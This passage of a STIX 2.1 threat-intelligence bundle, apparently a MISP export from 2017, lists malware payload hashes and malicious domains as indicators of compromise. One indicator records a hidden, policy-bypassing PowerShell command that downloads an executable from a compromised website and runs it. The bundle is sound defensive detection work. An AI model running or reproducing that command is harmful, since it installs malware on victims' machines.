"pattern": "[file:hashes.SHA256 = 'e6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a23-ed90-4a30-8a1d-41cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '79ca3b8afac2ca896d7db2110789a187ad75810e2d92aa6f0378f73c1f72006f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a24-6b08-4b9b-a074-460b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a25-3654-4cfa-91f7-4cfb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a27-09ac-4997-a854-442e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a28-24c4-482a-8720-47af950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a29-30d0-48f5-96de-417e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a2a-e610-4bc1-8ef4-4096950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a2b-29dc-4ae3-991c-4507950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a2c-8374-4020-906d-415b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a2d-c998-4841-8539-43e1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a2e-d414-4fb6-97ed-49dd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'bb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a2f-aca0-4f33-af9f-4e7c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a30-b940-49c9-bdb4-48f0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a31-fc68-496b-862d-4857950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a33-7870-4c60-83b8-4d87950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a34-1218-4673-b712-4ad7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:name = 'powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(\\'hxxp://nicklovegrove.co.uk/wp-content/margin2601_onechat_word.exe\\',\\'\\\\%appdata\\\\%.exe\\');start-process \\'\\\\%appdata\\\\%.exe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"filename\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bae-10d8-44ae-915e-41c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = '1c-host.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6baf-741c-46d1-babb-4f92950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = '1cpred.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb0-d0c4-4654-aff3-4d1e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'allforest.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb1-7d18-44e4-b8de-4765950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'antiprt.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb2-5a9c-47ac-82f7-458d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'atonix.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb3-a924-4e5e-9311-4f67950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbabbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb4-bca4-4073-a6b4-405d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbabbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb4-1654-4ff4-b9bd-4d27950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbebbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb5-d990-42c4-8c34-434d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbebbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb6-5d30-4f6e-9b06-4e34950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbibbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb7-f7c4-4c72-a620-4841950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbihbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb8-22dc-4645-8e5c-4006950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblabbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bb9-d95c-409f-9007-4a47950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblahbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bba-4298-41b8-a84f-499a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblebbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bbb-6608-49b7-b00a-4dcc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblebbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bbc-a478-4d95-b3fc-4c7b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblehbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bbd-a728-41e3-8f09-4434950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblibbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
